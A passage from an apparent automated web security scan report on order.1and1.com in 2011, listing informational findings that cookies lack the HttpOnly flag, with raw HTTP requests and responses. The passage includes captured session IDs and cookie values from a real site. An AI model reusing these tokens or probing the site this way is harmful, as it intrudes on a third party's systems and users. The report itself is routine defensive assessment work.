Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:34:33 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=8Z1wsLzAmT09mYHNpcDZuaDUnMWpdVy9GOTMbHxwcGzAyMC0tMC8pLDAjJSQjIEUzX1RWZBweMGA5Y3I4KywoJywoJiknISkgHyhgYSczOmpzOSwtKSgtKicqJSgpIiM=; Expires=Fri, 07-Apr-2079 21:48:40 GMT; Path=/
ETag: 5de0f14c7355940110db8a760b729cda
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 25629


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...

5.143. http://order.1and1.com/xml/order/TcSpecialOffers  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/TcSpecialOffers

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/TcSpecialOffers HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 18:35:56 GMT
Server: Apache
Set-Cookie: __PFIX_TST_=1e3836594d69800; Path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/TcSpecialOffers;jsessionid=821972D9CB5B2ECD2247E949E1706836.TCpfix142a
Content-Length: 0
Connection: close
Content-Type: text/plain


5.144. http://order.1and1.com/xml/order/TcSpecialOffers  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/TcSpecialOffers

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/TcSpecialOffers;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:35:59 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=5al8vMjMpUlJSTF9sczlxazgqNG1gWjJJPDYeIh8fHhweHDAwMzIsLzMmKCcmI0g2YldZZx8hHEwlZnU7Li8rKi8rKSwqJCwjIitjZCofJlZ2PC8wLCswLSotKCssJSY=; Expires=Fri, 07-Apr-2079 21:50:06 GMT; Path=/
ETag: b22950bae17c91bdd0f7a1640caa71a1
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 22489


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...

5.145. http://order.1and1.com/xml/order/TellAFriend  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/TellAFriend

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/TellAFriend HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 18:36:37 GMT
Server: Apache
Set-Cookie: __PFIX_TST_=7ed924d0b7cb6c00; Path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/TellAFriend;jsessionid=814CEBE489553A29B51D0D417D2FA61A.TCpfix141a
Content-Length: 0
Connection: close
Content-Type: text/plain


5.146. http://order.1and1.com/xml/order/TellAFriend  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/TellAFriend

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/TellAFriend;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&linkOrigin=Hosting&linkId=ft.nav.tellafriend&linkType=txt HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:37:03 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=IdGk5PD0zXFxcVmlfZixkXisdJ2BTZDxTRkAoLCkpKCYoJiMjJiUfIiYZGxowLVJAbGFjcSkrJlYvWWguISIeHSIeHDY0LjYtLDVtbjQpMGBpLyIjHx4jIB0gMjU2LzA=; Expires=Fri, 07-Apr-2079 21:51:10 GMT; Path=/
ETag: 94db72fd5b11780c9d37ff4ca080259b
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 18688


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...

5.147. http://order.1and1.com/xml/order/VirtualServer  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/VirtualServer

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/VirtualServer;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&__lf=Order-Tariff&linkOrigin=CloudDynamicServer&linkId=hd.tab.vps HTTP/1.1
Host: order.1and1.com
Proxy-Connection: keep-alive
Referer: http://order.1and1.com/xml/order/CloudDynamicServer;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&__lf=Static&linkOrigin=MsHosting&linkId=hd.nav.domains
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: backpage=Hosting; ucuo=20110320183236-002.TCpfix141a; lastpage=CloudDynamicServer; ac-whom-us=OM.US.USa02K18619H7072a; variant.configname=2010-04-14; variant=QUM6ZGVmYXVsdA==; __PFIX_TST_=6185bdfc6163d400; UT=YZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:30:AAABLtRnZNPcSJFdN9f55FNyE*t5Qv64:1300643669203; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 17:54:16 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=yZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; Expires=Fri, 07-Apr-2079 21:08:23 GMT; Path=/
ETag: dd3a6908188586141eb93efcd06408c1
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 25297


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...

5.148. http://order.1and1.com/xml/order/VirtualServer  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/VirtualServer

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/VirtualServer HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 18:33:57 GMT
Server: Apache
Set-Cookie: __PFIX_TST_=1629a85634893c00; Path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/VirtualServer;jsessionid=C2308EF9B0B46214BD37352C5DF6EE78.TCpfix142a
Content-Length: 0
Connection: close
Content-Type: text/plain


5.149. http://order.1and1.com/xml/order/VirtualServerL  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/VirtualServerL

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/VirtualServerL;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&__lf=Order-Tariff&ordernow=true HTTP/1.1
Host: order.1and1.com
Proxy-Connection: keep-alive
Referer: http://order.1and1.com/xml/order/VirtualServer;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&__lf=Order-Tariff&linkOrigin=CloudDynamicServer&linkId=hd.tab.vps
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: backpage=CloudDynamicServer; ucuo=20110320185042-000.TCpfix141a; lastpage=VirtualServer; ac-whom-us=OM.US.USa02K18619H7072a; variant.configname=2010-04-14; variant=QUM6ZGVmYXVsdA==; __PFIX_TST_=6185bdfc6163d400; UT=hdWo6PT40XV1dV2pgZy1lXyweKGFUTj1UR0EpLSoqKScpJyQkJyYgIycaHBsaLlNBbWJkciosJ1cwWmkvIiMfHiMfHSA1LzcuLTZubzUqMWFqMCMkIB8kIR8fHjMxMzY=; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:31:AAABLtRnmq4LJJFFFit1Kk3sM2vCTUk2:1300643682990; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 17:54:24 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=aZVoqLS4kZGRkXnFnbjRsZjMlL2hbVS1ENzEZHRoxMC4wLisrLi0nKi4hIyIhHkMxXVJUYjEzLl43YXA2KSomJSomJCclHyceHSZedjwxOGhxNyorJyYrKCYmJSMhIyY=; Expires=Fri, 07-Apr-2079 21:08:31 GMT; Path=/
ETag: 8445c1f0969d65ef75b448c84b35d290
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 48662


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...

5.150. http://order.1and1.com/xml/order/VirtualServerL  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/VirtualServerL

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/VirtualServerL HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 18:50:41 GMT
Server: Apache
Set-Cookie: __PFIX_TST_=3f29a4af086a7400; Path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/VirtualServerL;jsessionid=B6A0DDB4C9D77F6E2F638CC55443C1A0.TCpfix141a
Content-Length: 0
Connection: close
Content-Type: text/plain


5.151. http://order.1and1.com/xml/order/VirtualServerXL  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/VirtualServerXL

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/VirtualServerXL HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 18:51:01 GMT
Server: Apache
Set-Cookie: __PFIX_TST_=5bfc5160a7724c00; Path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/VirtualServerXL;jsessionid=67A05F3546DF54F05E7E1C8F2AFF7904.TCpfix142a
Content-Length: 0
Connection: close
Content-Type: text/plain


5.152. http://order.1and1.com/xml/order/VirtualServerXXL  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/VirtualServerXXL

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/VirtualServerXXL HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 18:51:19 GMT
Server: Apache
Set-Cookie: __PFIX_TST_=fe6152de8608c00; Path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/VirtualServerXXL;jsessionid=F5B87BF4E4F277246DDE16E8B5F7FAFB.TCpfix141a
Content-Length: 0
Connection: close
Content-Type: text/plain


5.153. http://order.1and1.com/xml/order/a  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/a

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/a HTTP/1.1
Host: order.1and1.com
Proxy-Connection: keep-alive
Referer: http://order.1and1.com/xml/order/VirtualServerL;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&__lf=Order-Tariff&ordernow=true
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: backpage=domaincheck; ucuo=20110320185042-000.TCpfix141a; lastpage=MsHosting; ac-whom-us=OM.US.USa02K18619H7072a; variant.configname=2010-04-14; variant=QUM6ZGVmYXVsdA==; __PFIX_TST_=6185bdfc6163d400; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:35:AAABLtRozfrxbl4XBdcVOt1gOzbPq29h:1300643761658; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; UT=1bmMzNjctVlZWUGNZYCZebzwuOHFkXjZNQDoiJiMjIiAiIB0dIB8wMzcqLCsqJ0w6ZltdayMlIFApU2IoGzMvLjMvLTAuKDAnJi9naC4jKlpjKRwdMC80MS8vLiwqLC8=

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 17:56:14 GMT
Server: Apache
Set-Cookie: __PFIX_TST_=11df10d3b144d000; Path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/a;jsessionid=32FBEC28C43E74DBD62611CCB0A88751.TCpfix142a
Content-Length: 0
Content-Type: text/plain


5.154. http://order.1and1.com/xml/order/addon  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/addon

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/addon HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
